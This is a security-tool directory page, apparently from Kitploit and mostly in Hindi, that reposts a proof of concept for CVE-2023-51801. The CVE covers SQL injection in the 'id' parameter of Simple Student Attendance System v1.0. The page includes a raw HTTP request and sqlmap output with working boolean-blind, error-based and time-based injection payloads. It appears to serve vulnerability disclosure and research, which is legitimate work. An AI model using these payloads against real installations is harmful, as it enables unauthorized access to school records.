Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-51801 — सरल छात्र उपस्थिति प्रणाली v.1.0 - एकाधिक SQL इंजेक्शन कमजोरियाँ - student_form.php और class_form.php | Kitploit
उपकरण/GitHubGitHub/geraldoalcantara/cve-2023-51801
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubgeraldoalcantara/cve-2023-51801

CVE-2023-51801

सरल छात्र उपस्थिति प्रणाली v.1.0 - एकाधिक SQL इंजेक्शन कमजोरियाँ - student_form.php और class_form.php

रिपॉजिटरी देखें
112 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-51801

Simple Student Attendance System v.1.0 - एकाधिक SQL इंजेक्शन कमजोरियाँ - student_form.php और class_form.php

विवरण: Simple Student Attendance System v.1.0 में एकाधिक SQL इंजेक्शन कमजोरियाँ हैं जिनका प्रमाणित हमलावर शोषण कर सकते हैं। ये कमजोरियाँ student_form.php और class_form.php में मौजूद हैं, जो 'id' पैरामीटर के माध्यम से मनमाने SQL कमांड के निष्पादन की अनुमति देती हैं।

कमजोर उत्पाद संस्करण: Simple Student Attendance System v.1.0
CVE लेखक: Geraldo Alcântara
दिनांक: 29/11/2023
पुष्टि तिथि: 10/01/2024
CVE: CVE-2023-51801
CVE लिंक: https://www.cve.org/CVERecord?id=CVE-2023-51801
NVD लिंक: https://nvd.nist.gov/vuln/detail/CVE-2023-51801
Tenable लिंक: https://www.tenable.com/cve/CVE-2023-51801
परीक्षित: Windows

पुनरुत्पादन के चरण:

इस कमजोरी का शोषण करने के लिए, हमलावर को 'Student' या 'Classes' पृष्ठों पर जाना होगा, जहाँ वे किसी छात्र या कक्षा को संपादित या जोड़ सकते हैं। दुर्भावनापूर्ण payload को फिर 'id' पैरामीटर में डाला जाना चाहिए।
प्रभावित घटक:

घटक: student_form.php और class_form.php
पैरामीटर: id

अनुरोध:

root@kitploit:~
POST /php-attendance/modals/class_form.php HTTP/1.1
Host: 192.168.68.182
Cookie: PHPSESSID=emhqgom5shgrtcii7p3a8ad1bo
Content-Length: 4
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.68.182
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.68.182/php-attendance/?page=class_list
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=1, i
Connection: close

id=1'

SQLMap

root@kitploit:~
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1''' AND 4206=4206-- KDFY

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1''' OR (SELECT 1707 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,(SELECT (ELT(1707=1707,1))),0x717a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- xsae

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1''' AND (SELECT 1288 FROM (SELECT(SLEEP(5)))SVhp)-- EYkh

खोजकर्ता/श्रेय:
Geraldo Alcântara

टूल डाउनलोड करें